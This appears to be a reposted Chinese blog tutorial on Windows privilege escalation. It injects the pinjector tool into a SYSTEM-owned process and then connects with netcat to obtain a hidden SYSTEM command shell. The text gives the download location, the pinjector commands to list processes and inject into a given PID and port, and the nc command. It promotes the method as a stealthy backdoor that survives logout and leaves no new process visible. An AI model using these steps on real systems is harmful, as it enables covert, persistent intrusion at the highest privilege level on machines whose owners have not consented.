【提權】注入進程提權


注入進程提權【相當於開了一個后門,隱蔽性極高,不會創建新的進程,很難發現】

注入到system用戶的進程,當管理員賬戶或其他賬戶注銷后,后門仍然存在。可以理解為將pinjector注入到其他用戶的進程里一起運行,進而同時擁有了對應的權限。

下面是圖文教程。

0x01

從http://www.tarasco.org/security/Process_Injector/  下載pinjector.exe文件。放在windows2003server的c盤根目錄。

0x02將壓縮包中的pinjector.exe提取出放在c盤根目錄。

0x03執行pinjector.exe -l 可查看可以注入的進程。

可以看到不同的進程對應不同PID和用戶。

0x04執行pinjector.exe -p 600 cmd 2345   注入進程pid為600的進程,使用端口2345返回cmd,執行成功后在任務管理器里並沒有多出進程。

0x05使用kali的nc 192.168.70.135 2345

反彈shell並提權為system。

 

 

<script>
window.tctipConfig = {
staticPrefix: "http://static.tctip.com",
buttonImageId: 1,
buttonTip: "zanzhu",
list:{
alipay: {qrimg: "http://tctip.com/img/alipayqr.png"},
weixin:{qrimg: "http://littlebtc.com/images/yeshen.png"},
}
};
</script>
<script src="http://static.tctip.com/js/tctip.min.js"></script>

 

#####################################################################################################################

總結

將進程注入system服務進程

pinjector.exe進程注入器

http://www.tarasco.org/security/Process_Injector/ {需要FQ下載}

###pinjector.exe -l#查看可注入進程

###pinjector.exe -p <PID> cmd <ports>

nc -nv <IP> <ports>    //監聽端口。成功后會反彈system的shell。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM